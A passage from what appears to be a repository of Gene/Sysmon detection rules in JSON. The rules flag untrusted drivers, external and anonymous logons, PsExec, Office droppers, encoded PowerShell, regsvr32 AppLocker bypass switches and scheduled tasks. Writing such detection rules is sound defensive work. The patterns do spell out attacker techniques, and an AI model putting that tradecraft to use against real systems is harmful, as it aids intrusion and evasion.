| "Matches": [ 67 | "$valid: SignatureStatus = 'Valid'", 68 | "$unavailable: SignatureStatus = 'Unavailable'" 69 | ], 70 | "Condition": "!$valid and !$unavailable" 71 | } 72 | 73 | { 74 | "Name": "UntrustedDriverLoaded", 75 | "Tags": [ 76 | "DriverLoaded", 77 | "Sysmon" 78 | ], 79 | "Meta": { 80 | "Events": { 81 | "Microsoft-Windows-Sysmon/Operational": [ 82 | 6 83 | ] 84 | }, 85 | "Computers": [], 86 | "Criticality": 10, 87 | "ATTACK": [ 88 | { 89 | "ID": "T1014", 90 | "Tactic": "Defense Evasion", 91 | "Reference": "https://attack.mitre.org/techniques/T1014/" 92 | } 93 | ], 94 | "Author": "@0xrawsec", 95 | "Comment": "Untrusted Driver Loaded. Need to be adjusted according to the environment.", 96 | "Schema": "2.0.0" 97 | }, 98 | "Matches": [ 99 | "$trusted: Signature ~= '{{trusted-drv-sig}}'" 100 | ], 101 | "Condition": "!$trusted" 102 | } 103 | 104 | -------------------------------------------------------------------------------- /rules/filters/sysmon.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ProcessCreate", 3 | "Meta": { 4 | "Events": { 5 | "Microsoft-Windows-Sysmon/Operational": [ 6 | 1 7 | ] 8 | }, 9 | "Filter": true, 10 | "Comments": "Filter in any Sysmon ProcessCreate event", 11 | "Schema": "2.0.0" 12 | }, 13 | "Matches": [], 14 | "Condition": "" 15 | } 16 | 17 | { 18 | "Name": "NetworkConnect", 19 | "Meta": { 20 | "Events": { 21 | "Microsoft-Windows-Sysmon/Operational": [ 22 | 3 23 | ] 24 | }, 25 | "Filter": true, 26 | "Disable": true, 27 | "Comments": "Filter in any Sysmon NetworkConnect event", 28 | "Schema": "2.0.0" 29 | }, 30 | "Matches": [], 31 | "Condition": "" 32 | } 33 | 34 | -------------------------------------------------------------------------------- /rules/informative.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "InfoSuspiciousParent", 3 | "Tags": [ 4 | "Info" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 0, 14 | "Author": "0xrawsec", 15 | "Comments": "Informative rule to tag suspicious parent command line", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$susp: ParentImage ~= '{{suspicious}}$'" 20 | ], 21 | "Condition": "$susp" 22 | } 23 | 24 | { 25 | "Name": "InfoRemotePath", 26 | "Tags": [ 27 | "Info", 28 | "Lateral" 29 | ], 30 | "Meta": { 31 | "Events": { 32 | "Microsoft-Windows-Sysmon/Operational": [ 33 | 1 34 | ] 35 | }, 36 | "Computers": [], 37 | "Criticality": 0, 38 | "Author": "0xrawsec", 39 | "Comment": "Heuristic to catch remote path in command line", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$rpath: CommandLine ~= '(?i:\\\\\\\\[\\w\\.]+)'" 44 | ], 45 | "Condition": "$rpath" 46 | } 47 | 48 | -------------------------------------------------------------------------------- /rules/laterals.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "LogonFromExternal", 3 | "Tags": [ 4 | "Lateral", 5 | "Security" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Security": [ 10 | 4624 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 10, 15 | "Author": "@0xrawsec", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$iplh1: IpAddress = '-'", 20 | "$iplh2: IpAddress = '127.0.0.1'", 21 | "$iplh3: IpAddress = '::1'", 22 | "$privip: IpAddress ~= '{{priv-ipv4}}'" 23 | ], 24 | "Condition": "!($privip or $iplh1 or $iplh2 or $iplh3)" 25 | } 26 | 27 | { 28 | "Name": "AnonymousNetworkLogon", 29 | "Tags": [ 30 | "Lateral", 31 | "Security" 32 | ], 33 | "Meta": { 34 | "Events": { 35 | "Security": [ 36 | 4624 37 | ] 38 | }, 39 | "Computers": [], 40 | "Criticality": 5, 41 | "Author": "@0xrawsec", 42 | "Schema": "2.0.0" 43 | }, 44 | "Matches": [ 45 | "$logt: LogonType = '3'", 46 | "$kerb: AuthenticationPackageName = 'Kerberos'", 47 | "$user: TargetUserName = 'ANONYMOUS LOGON'", 48 | "$iplh1: IpAddress = '-'", 49 | "$iplh2: IpAddress = '127.0.0.1'" 50 | ], 51 | "Condition": "$logt and !$kerb and $user and !$iplh1 and !$iplh2" 52 | } 53 | 54 | { 55 | "Name": "ExplicitNetworkLogon", 56 | "Tags": [ 57 | "Lateral", 58 | "Security" 59 | ], 60 | "Meta": { 61 | "Events": { 62 | "Security": [ 63 | 4624 64 | ] 65 | }, 66 | "Computers": [], 67 | "Criticality": 5, 68 | "Author": "@0xrawsec", 69 | "Schema": "2.0.0" 70 | }, 71 | "Matches": [ 72 | "$logt: LogonType = '3'", 73 | "$user: TargetUserName = 'ANONYMOUS LOGON'", 74 | "$iplh1: IpAddress = '-'", 75 | "$iplh2: IpAddress = '127.0.0.1'", 76 | "$enddol: TargetUserName ~= '\\$$'" 77 | ], 78 | "Condition": "$logt and !($user or $iplh1 or $iplh2 or $enddol)" 79 | } 80 | 81 | { 82 | "Name": "PsExec4624", 83 | "Tags": [ 84 | "Lateral", 85 | "Security" 86 | ], 87 | "Meta": { 88 | "Events": { 89 | "Security": [ 90 | 4624 91 | ] 92 | }, 93 | "Computers": [], 94 | "Criticality": 5, 95 | "Author": "@0xrawsec", 96 | "Schema": "2.0.0" 97 | }, 98 | "Matches": [ 99 | "$psexec: ProcessName ~= '(?i:\\\\PSEXESVC\\.exe$)'" 100 | ], 101 | "Condition": "$psexec" 102 | } 103 | 104 | { 105 | "Name": "AlternateExplicitCredentialUse", 106 | "Tags": [ 107 | "Lateral", 108 | "Security" 109 | ], 110 | "Meta": { 111 | "Events": { 112 | "Security": [ 113 | 4648 114 | ] 115 | }, 116 | "Computers": [], 117 | "Criticality": 4, 118 | "Author": "@0xrawsec", 119 | "Comment": "Experimental", 120 | "Schema": "2.0.0" 121 | }, 122 | "Matches": [ 123 | "$iplh1: IpAddress = '-'", 124 | "$iplh2: IpAddress = '127.0.0.1'", 125 | "$iplh3: IpAddress = '::1'", 126 | "$wlpn: ProcessName ~= 'C:\\\\Windows\\\\System32\\\\winlogon\\.exe'", 127 | "$wltsn: TargetServerName = 'localhost'" 128 | ], 129 | "Condition": "!$iplh1 and !$iplh2 and !$iplh3 and !$wlpn and !$wltsn" 130 | } 131 | 132 | { 133 | "Name": "HeurCLWithCreds", 134 | "Tags": [ 135 | "Heuristics", 136 | "Lateral" 137 | ], 138 | "Meta": { 139 | "Events": { 140 | "Microsoft-Windows-Sysmon/Operational": [ 141 | 1 142 | ] 143 | }, 144 | "Computers": [], 145 | "Criticality": 5, 146 | "Author": "0xrawsec", 147 | "Comments": "Experimental rule to catch command lines taking credentials as arguments.", 148 | "Schema": "2.0.0" 149 | }, 150 | "Matches": [ 151 | "$ruser: CommandLine ~= '(?i: /U )'", 152 | "$rhost: CommandLine ~= '(?i: /S )'", 153 | "$rpwd: CommandLine ~= '(?i: /P )'" 154 | ], 155 | "Condition": "$ruser and $rhost and $rpwd" 156 | } 157 | 158 | { 159 | "Name": "PrivUserLogon", 160 | "Tags": [ 161 | "Heuristics", 162 | "Lateral" 163 | ], 164 | "Meta": { 165 | "Events": { 166 | "Security": [ 167 | 4672 168 | ] 169 | }, 170 | "Computers": [], 171 | "Criticality": 5, 172 | "Author": "0xrawsec", 173 | "Comments": "", 174 | "Disable": true, 175 | "Schema": "2.0.0" 176 | }, 177 | "Matches": [], 178 | "Condition": "" 179 | } 180 | 181 | -------------------------------------------------------------------------------- /rules/network.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "PublicIPNetConn", 3 | "Tags": [ 4 | "Network" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 3 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 1, 14 | "Comments": "", 15 | "Author": "0xrawsec", 16 | "Disable": true, 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$privdir: Image ~= '^({{programfiles}}|{{system}})'", 21 | "$browser: Image ~= '{{browsers}}$'", 22 | "$dstmulticast: DestinationIp ~= '(?i:^(224|23(2|3|4)|239\\.))'", 23 | "$dstlocalhostv6: DestinationIp = '0:0:0:0:0:0:0:1'", 24 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 25 | "$init: Initiated = 'true'" 26 | ], 27 | "Condition": "!($dstmulticast or $dstprivip or ($browser and $privdir) or $dstlocalhostv6) and $init" 28 | } 29 | 30 | { 31 | "Name": "NoBrowserHTTP", 32 | "Tags": [ 33 | "Network" 34 | ], 35 | "Meta": { 36 | "Events": { 37 | "Microsoft-Windows-Sysmon/Operational": [ 38 | 3 39 | ] 40 | }, 41 | "Computers": [], 42 | "Criticality": 5, 43 | "Comments": "Connections to HTTP\u00a0standard port from other software than browsers", 44 | "Author": "0xrawsec", 45 | "Disable": true, 46 | "Schema": "2.0.0" 47 | }, 48 | "Matches": [ 49 | "$browser: Image ~= '{{browsers}}$'", 50 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 51 | "$init: Initiated = 'true'", 52 | "$http: DestinationPort = '80'", 53 | "$https: DestinationPort = '443'" 54 | ], 55 | "Condition": "$init and ($http or $https) and !$browser" 56 | } 57 | 58 | { 59 | "Name": "UnkPrivDstPort", 60 | "Tags": [ 61 | "Network" 62 | ], 63 | "Meta": { 64 | "Events": { 65 | "Microsoft-Windows-Sysmon/Operational": [ 66 | 3 67 | ] 68 | }, 69 | "Computers": [], 70 | "Criticality": 6, 71 | "Comments": "Unknown network protocol on private IP address range", 72 | "Author": "0xrawsec", 73 | "Schema": "2.0.0" 74 | }, 75 | "Matches": [ 76 | "$dstlocalhostv6: DestinationIp = '0:0:0:0:0:0:0:1'", 77 | "$dstlocalhost: DestinationIp = '127.0.0.1'", 78 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 79 | "$unk: DestinationPortName ~= '^$'", 80 | "$system: Image ~= '^{{system}}'", 81 | "$init: Initiated = 'true'" 82 | ], 83 | "Condition": "!$system and $dstprivip and !($dstlocalhost or $dstlocalhostv6) and $unk and $init" 84 | } 85 | 86 | { 87 | "Name": "UnkDstPort", 88 | "Tags": [ 89 | "Network" 90 | ], 91 | "Meta": { 92 | "Events": { 93 | "Microsoft-Windows-Sysmon/Operational": [ 94 | 3 95 | ] 96 | }, 97 | "Computers": [], 98 | "Criticality": 8, 99 | "Comments": "Unknown network protocol on private IP address range", 100 | "Author": "0xrawsec", 101 | "Schema": "2.0.0" 102 | }, 103 | "Matches": [ 104 | "$dstlocalhost: DestinationIp = '127.0.0.1'", 105 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 106 | "$unk: DestinationPortName ~= '^$'", 107 | "$system: Image ~= '^{{system}}'", 108 | "$init: Initiated = 'true'" 109 | ], 110 | "Condition": "!$system and !$dstprivip and !$dstlocalhost and $unk and $init" 111 | } 112 | 113 | -------------------------------------------------------------------------------- /rules/office.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "MSOfficeThreat", 3 | "Tags": [ 4 | "Office", 5 | "Threat" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "ATTACK": [ 16 | { 17 | "ID": "T1193", 18 | "Tactic": "initial-access", 19 | "Reference": "https://attack.mitre.org/techniques/T1193" 20 | } 21 | ], 22 | "Author": "0xrawsec", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 27 | "$susp: Image ~= '{{suspicious}}$'", 28 | "$fp1: CommandLine ~= '(?i:shell32\\.dll,(OpenAs_RunDLL|SHCreateLocalServerRunDll|Control_RunDLL))'" 29 | ], 30 | "Condition": "$pimsoffice and !$fp1 and $susp" 31 | } 32 | 33 | { 34 | "Name": "OfficeDropper", 35 | "Tags": [ 36 | "Office", 37 | "Dropper" 38 | ], 39 | "Meta": { 40 | "Events": { 41 | "Microsoft-Windows-Sysmon/Operational": [ 42 | 11 43 | ] 44 | }, 45 | "Computers": [], 46 | "Criticality": 8, 47 | "ATTACK": [ 48 | { 49 | "ID": "T1193", 50 | "Tactic": "initial-access", 51 | "Reference": "https://attack.mitre.org/techniques/T1193" 52 | } 53 | ], 54 | "Author": "0xrawsec", 55 | "Comments": "Experimental rule to detect executable created by MSOffice tools.", 56 | "Schema": "2.0.0" 57 | }, 58 | "Matches": [ 59 | "$office: Image ~= '{{msoffice}}$'", 60 | "$target: TargetFilename ~= '({{exec-exts}}|{{script-exts}})$'" 61 | ], 62 | "Condition": "$office and $target" 63 | } 64 | 65 | { 66 | "Name": "OfficeDropperExec", 67 | "Tags": [ 68 | "Office", 69 | "Dropper" 70 | ], 71 | "Meta": { 72 | "Events": { 73 | "Microsoft-Windows-Sysmon/Operational": [ 74 | 1 75 | ] 76 | }, 77 | "Computers": [], 78 | "Criticality": 8, 79 | "ATTACK": [ 80 | { 81 | "ID": "T1193", 82 | "Tactic": "initial-access", 83 | "Reference": "https://attack.mitre.org/techniques/T1193" 84 | } 85 | ], 86 | "Author": "0xrawsec", 87 | "Comment": "Experimental rule to catch MS Office based droppers", 88 | "Schema": "2.0.0" 89 | }, 90 | "Matches": [ 91 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 92 | "$whitelisted: Image ~= '^({{windows}}|{{programfiles}}|{{appv}})'" 93 | ], 94 | "Condition": "$pimsoffice and !$whitelisted" 95 | } 96 | 97 | { 98 | "Name": "OfficeNetConn", 99 | "Tags": [ 100 | "Office", 101 | "Network" 102 | ], 103 | "Meta": { 104 | "Events": { 105 | "Microsoft-Windows-Sysmon/Operational": [ 106 | 3 107 | ] 108 | }, 109 | "Computers": [], 110 | "Criticality": 3, 111 | "Author": "0xrawsec", 112 | "Disable": true, 113 | "Schema": "2.0.0" 114 | }, 115 | "Matches": [ 116 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 117 | "$net: Initiated ~= 'true'" 118 | ], 119 | "Condition": "$pimsoffice and $net" 120 | } 121 | 122 | { 123 | "Name": "FromDownloadedDocument", 124 | "Tags": [ 125 | "Office", 126 | "Download" 127 | ], 128 | "Meta": { 129 | "Events": { 130 | "Microsoft-Windows-Sysmon/Operational": [ 131 | 1 132 | ] 133 | }, 134 | "Computers": [], 135 | "Criticality": 0, 136 | "Author": "0xrawsec", 137 | "Comment": "This rule is used as a simple informative tag", 138 | "Schema": "2.0.0" 139 | }, 140 | "Matches": [ 141 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 142 | "$pcl: ParentCommandLine ~= '(?i:appdata\\\\local\\\\microsoft\\\\windows\\\\temporary internet files\\\\)'" 143 | ], 144 | "Condition": "$pimsoffice and $pcl" 145 | } 146 | 147 | -------------------------------------------------------------------------------- /rules/powershell.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "PowershellExecEnc", 3 | "Tags": [ 4 | "Powershell", 5 | "Heuristics" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 5, 15 | "ATTACK": [ 16 | { 17 | "ID": "T1202", 18 | "Tactic": "Defense Evasion", 19 | "Reference": "https://attack.mitre.org/techniques/T1202/" 20 | } 21 | ], 22 | "Author": "0xrawsec", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$i: Image ~= '(?i:\\\\powershell.exe$)'", 27 | "$enc: CommandLine ~= '(?i: (-|/)e[ncodedcommands]* )'" 28 | ], 29 | "Condition": "$i and $enc" 30 | } 31 | 32 | { 33 | "Name": "PowershellNetConn", 34 | "Tags": [ 35 | "Powershell", 36 | "Network" 37 | ], 38 | "Meta": { 39 | "Events": { 40 | "Microsoft-Windows-Sysmon/Operational": [ 41 | 3 42 | ] 43 | }, 44 | "Computers": [], 45 | "Criticality": 5, 46 | "Author": "0xrawsec", 47 | "Disable": true, 48 | "Schema": "2.0.0" 49 | }, 50 | "Matches": [ 51 | "$ps: Image ~= '(?i:\\\\powershell.exe$)'", 52 | "$net: Initiated ~= 'true'" 53 | ], 54 | "Condition": "$ps and $net" 55 | } 56 | 57 | { 58 | "Name": "PowershellLargeCL", 59 | "Tags": [ 60 | "Heuristics", 61 | "CL" 62 | ], 63 | "Meta": { 64 | "Events": { 65 | "Microsoft-Windows-Sysmon/Operational": [ 66 | 1 67 | ] 68 | }, 69 | "Computers": [], 70 | "Criticality": 4, 71 | "Author": "@0xrawsec", 72 | "Comment": "Match command line larger than 512 characters", 73 | "Schema": "2.0.0" 74 | }, 75 | "Matches": [ 76 | "$lcl: CommandLine ~= '.{512,}'", 77 | "$ps: Image ~= '(?i:\\\\powershell.exe$)'" 78 | ], 79 | "Condition": "$lcl and $ps" 80 | } 81 | 82 | { 83 | "Name": "PowershellEmbeddedC#", 84 | "Tags": [ 85 | "Powershell", 86 | "EmbeddedCode" 87 | ], 88 | "Meta": { 89 | "Events": { 90 | "Microsoft-Windows-Sysmon/Operational": [ 91 | 1 92 | ] 93 | }, 94 | "Computers": [], 95 | "Criticality": 3, 96 | "Author": "@0xrawsec", 97 | "Comment": "Powershell Script embedding C#", 98 | "Schema": "2.0.0" 99 | }, 100 | "Matches": [ 101 | "$ps: ParentImage ~= '(?i:\\\\powershell.exe$)'", 102 | "$csc: Image ~= '(?i:\\\\csc.exe$)'" 103 | ], 104 | "Condition": "$csc and $ps" 105 | } 106 | 107 | { 108 | "Name": "PowershellStdin", 109 | "Tags": [ 110 | "Powershell" 111 | ], 112 | "Meta": { 113 | "Events": { 114 | "Microsoft-Windows-Sysmon/Operational": [ 115 | 1 116 | ] 117 | }, 118 | "Computers": [], 119 | "Criticality": 5, 120 | "ATTACK": [ 121 | { 122 | "ID": "T1202", 123 | "Tactic": "Defense Evasion", 124 | "Reference": "https://attack.mitre.org/techniques/T1202/" 125 | } 126 | ], 127 | "Author": "@0xrawsec", 128 | "Comment": "Powershell reads command from stdin", 129 | "Schema": "2.0.0" 130 | }, 131 | "Matches": [ 132 | "$ps: Image ~= '(?i:\\\\powershell.exe$)'", 133 | "$arg: CommandLine ~= '(?i: (-|/)c[ommand]*\\s+-)'" 134 | ], 135 | "Condition": "$ps and $arg" 136 | } 137 | 138 | { 139 | "Name": "PSC#Win32API", 140 | "Tags": [ 141 | "Powershell", 142 | "C#", 143 | "ScriptBlock" 144 | ], 145 | "Meta": { 146 | "Events": { 147 | "Microsoft-Windows-PowerShell/Operational": [] 148 | }, 149 | "Computers": [], 150 | "Criticality": 7, 151 | "Author": "@0xrawsec", 152 | "Comment": "Powershell embedding C# calling interesting Win32 APIs", 153 | "Schema": "2.0.0" 154 | }, 155 | "Matches": [ 156 | "$api: ScriptBlockText ~= '(?i:(OpenProcess|OpenThread|SetThreadContext|OpenThreadToken|GetProcAddress|OpenThreadToken|OpenProcessToken|CreateProcess|WriteProcessMemory|ReadProcessMemory|VirtualAlloc))'" 157 | ], 158 | "Condition": "$api" 159 | } 160 | 161 | { 162 | "Name": "PSInvokeExpression", 163 | "Tags": [ 164 | "Powershell" 165 | ], 166 | "Meta": { 167 | "Events": { 168 | "Microsoft-Windows-PowerShell/Operational": [ 169 | 4103 170 | ] 171 | }, 172 | "Computers": [], 173 | "Criticality": 6, 174 | "Author": "0xrawsec", 175 | "Comment": "Powershell making use of Invoke-Expression cmdlet. May require filtering depending on environment", 176 | "ATTACK": [ 177 | { 178 | "ID": "T1202", 179 | "Tactic": "Defense Evasion", 180 | "Reference": "https://attack.mitre.org/techniques/T1202/" 181 | } 182 | ], 183 | "Schema": "2.0.0" 184 | }, 185 | "Matches": [ 186 | "$ci: Payload ~= 'CommandInvocation\\(Invoke-Expression\\)'" 187 | ], 188 | "Condition": "$ci" 189 | } 190 | 191 | -------------------------------------------------------------------------------- /rules/privesc.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HeuristicPrivEsc", 3 | "Tags": [ 4 | "PrivEsc", 5 | "Heuristics" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 10 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "MinSysmonVersion": "v13.34", 16 | "Author": "0xrawsec", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$src_image_wl: SourceImage ~= '(?i:{{system}}(taskmgr)\\.exe)'", 21 | "$sync_access: GrantedAccess = '0x100000'", 22 | "$src_user: SourceUser ~= '(?i:NT AUTHORITY\\\\)'", 23 | "$tgt_user: TargetUser ~= '(?i:NT AUTHORITY\\\\)'" 24 | ], 25 | "Condition": "!$sync_access and (!$src_user and $tgt_user) and !$src_image_wl" 26 | } 27 | 28 | { 29 | "Name": "HeuristicSuspiciousAccess", 30 | "Tags": [ 31 | "Heuristics" 32 | ], 33 | "Meta": { 34 | "Events": { 35 | "Microsoft-Windows-Sysmon/Operational": [ 36 | 10 37 | ] 38 | }, 39 | "Computers": [], 40 | "Criticality": 8, 41 | "MinSysmonVersion": "v13.34", 42 | "Author": "0xrawsec", 43 | "Schema": "2.0.0" 44 | }, 45 | "Matches": [ 46 | "$unk_calltrace: CallTrace ~= 'UNKNOWN'", 47 | "$sync_access: GrantedAccess = '0x100000'", 48 | "$src_user: SourceUser ~= '(?i:NT AUTHORITY\\\\)'", 49 | "$tgt_user: TargetUser ~= '(?i:NT AUTHORITY\\\\)'" 50 | ], 51 | "Condition": "!$sync_access and (!$src_user and $tgt_user) and $unk_calltrace" 52 | } -------------------------------------------------------------------------------- /rules/psexec.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "PsExec", 3 | "Tags": [ 4 | "Powershell", 5 | "Heuristics" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 7, 15 | "Author": "0xrawsec", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$psexec: Product = 'Sysinternals PsExec'", 20 | "$im: Image ~= '(?i:\\\\psexe(c|svc).exe$)'" 21 | ], 22 | "Condition": "$psexec and $im" 23 | } 24 | 25 | { 26 | "Name": "HiddenPsExec", 27 | "Tags": [ 28 | "Powershell", 29 | "Heuristics" 30 | ], 31 | "Meta": { 32 | "Events": { 33 | "Microsoft-Windows-Sysmon/Operational": [ 34 | 1 35 | ] 36 | }, 37 | "Computers": [], 38 | "Criticality": 9, 39 | "Author": "0xrawsec", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$psexec: Product = 'Sysinternals PsExec'", 44 | "$im: Image ~= '(?i:\\\\psexe(c|svc).exe$)'" 45 | ], 46 | "Condition": "$psexec and !$im" 47 | } 48 | 49 | { 50 | "Name": "PsExecCommand", 51 | "Tags": [ 52 | "Powershell", 53 | "Heuristics" 54 | ], 55 | "Meta": { 56 | "Events": { 57 | "Microsoft-Windows-Sysmon/Operational": [ 58 | 1 59 | ] 60 | }, 61 | "Computers": [], 62 | "Criticality": 10, 63 | "Author": "0xrawsec", 64 | "Schema": "2.0.0" 65 | }, 66 | "Matches": [ 67 | "$psexesvc: ParentImage ~= '(?i:\\\\psexesvc.exe$)'" 68 | ], 69 | "Condition": "$psexesvc" 70 | } 71 | 72 | -------------------------------------------------------------------------------- /rules/regsvr32.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Regsvr32ApplockerBypass", 3 | "Tags": [ 4 | "Regsvr32", 5 | "AppLockerBypass", 6 | "Sysmon" 7 | ], 8 | "Meta": { 9 | "Events": { 10 | "Microsoft-Windows-Sysmon/Operational": [ 11 | 1 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 10, 16 | "ATTACK": [ 17 | { 18 | "ID": "T1117", 19 | "Tactic": "execution", 20 | "Reference": "https://attack.mitre.org/techniques/T1117" 21 | } 22 | ], 23 | "Author": "@0xrawsec", 24 | "Comment": "Rule that triggers on malicious use of regsvr32.exe (see:\u00a0metasploit regsvr32_applocker_bypass_server exploit)", 25 | "Schema": "2.0.0" 26 | }, 27 | "Matches": [ 28 | "$im: Image ~= '(?i:^c:\\\\windows\\\\sys(wow64|tem32)\\\\regsvr32.exe$)'", 29 | "$sw1: CommandLine ~= '(?i: /n )'", 30 | "$sw2: CommandLine ~= '(?i: /s )'", 31 | "$sw3: CommandLine ~= '(?i: /u )'", 32 | "$sw4: CommandLine ~= '(?i: /i:)'" 33 | ], 34 | "Condition": "$im and $sw4 and $sw3 and $sw2 and $sw1" 35 | } 36 | 37 | -------------------------------------------------------------------------------- /rules/remotethread.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "RemoteThread", 3 | "Tags": [ 4 | "RemoteThread", 5 | "Sysmon" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 8 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 5, 15 | "Author": "@0xrawsec", 16 | "Comment": "This rule catches any unusual CreateRemoteThread events. This rule has been disabled because it did not prove its usefulness", 17 | "Disable": true, 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$svchost: SourceImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\svchost\\.exe$)'", 22 | "$conhost: TargetImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\conhost\\.exe$)'", 23 | "$wlp1: SourceImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\csrss\\.exe$)'", 24 | "$wlp2: SourceImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE\\.exe$)'" 25 | ], 26 | "Condition": "!$wlp1 and !$wlp2 and !($svchost and $conhost)" 27 | } 28 | 29 | -------------------------------------------------------------------------------- /rules/rundll32.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SuspiciousRundll32", 3 | "Tags": [ 4 | "Rundll32" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 7 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 6, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1085", 17 | "Tactic": "execution", 18 | "Reference": "https://attack.mitre.org/techniques/T1085" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comments": "Experimental rule to try to spot suspicious DLLs loaded using rundll32.exe. Criticality may have to be adjusted.", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$im: Image ~= '(?i:^c:\\\\windows\\\\sys(wow64|tem32)\\\\rundll32.exe$)'", 27 | "$pgfiles: ImageLoaded ~= '(?i:^C:\\\\(PROGRA~2|Program Files.*?)\\\\)'", 28 | "$windows: ImageLoaded ~= '(?i:^C:\\\\Windows\\\\)'" 29 | ], 30 | "Condition": "$im and !($pgfiles or $windows)" 31 | } 32 | 33 | -------------------------------------------------------------------------------- /rules/schedtasks.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NewScheduledTask", 3 | "Tags": [ 4 | "ScheduledTasks" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 4, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1053", 17 | "Tactic": "privilege-escalation", 18 | "Reference": "https://attack.mitre.org/techniques/T1053" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comment": "Experimental rule to catch scheduled tasks creation", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$schtasks: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\schtasks\\.exe$)'", 27 | "$create: CommandLine ~= '(?i:/(xml|create))'", 28 | "$remote: CommandLine ~= '(?i:/S )'" 29 | ], 30 | "Condition": "$schtasks and !$remote and $create" 31 | } 32 | 33 | { 34 | "Name": "RunningScheduledTask", 35 | "Tags": [ 36 | "ScheduledTasks" 37 | ], 38 | "Meta": { 39 | "Events": { 40 | "Microsoft-Windows-Sysmon/Operational": [ 41 | 1 42 | ] 43 | }, 44 | "Computers": [], 45 | "Criticality": 3, 46 | "ATTACK": [ 47 | { 48 | "ID": "T1053", 49 | "Tactic": "privilege-escalation", 50 | "Reference": "https://attack.mitre.org/techniques/T1053" 51 | } 52 | ], 53 | "Author": "0xrawsec", 54 | "Comment": "Experimental rule to catch running scheduled tasks", 55 | "Schema": "2.0.0" 56 | }, 57 | "Matches": [ 58 | "$schtasks: ParentImage ~= '(?i:^c:\\\\windows\\\\system32\\\\schtasks\\.exe$)'" 59 | ], 60 | "Condition": "$schtasks" 61 | } 62 | 63 | { 64 | "Name": "NewRemoteScheduledTask", 65 | "Tags": [ 66 | "ScheduledTasks", 67 | "Lateral" 68 | ], 69 | "Meta": { 70 | "Events": { 71 | "Microsoft-Windows-Sysmon/Operational": [ 72 | 1 73 | ] 74 | }, 75 | "Computers": [], 76 | "Criticality": 7, 77 | "ATTACK": [ 78 | { 79 | "ID": "T1053", 80 | "Tactic": "privilege-escalation", 81 | "Reference": "https://attack.mitre.org/techniques/T1053" 82 | } 83 | ], 84 | "Author": "0xrawsec", 85 | "Comment": "Experimental rule to catch remote scheduled tasks creation", 86 | "Schema": "2.0.0" 87 | }, 88 | "Matches": [ 89 | "$schtasks: Image ~= 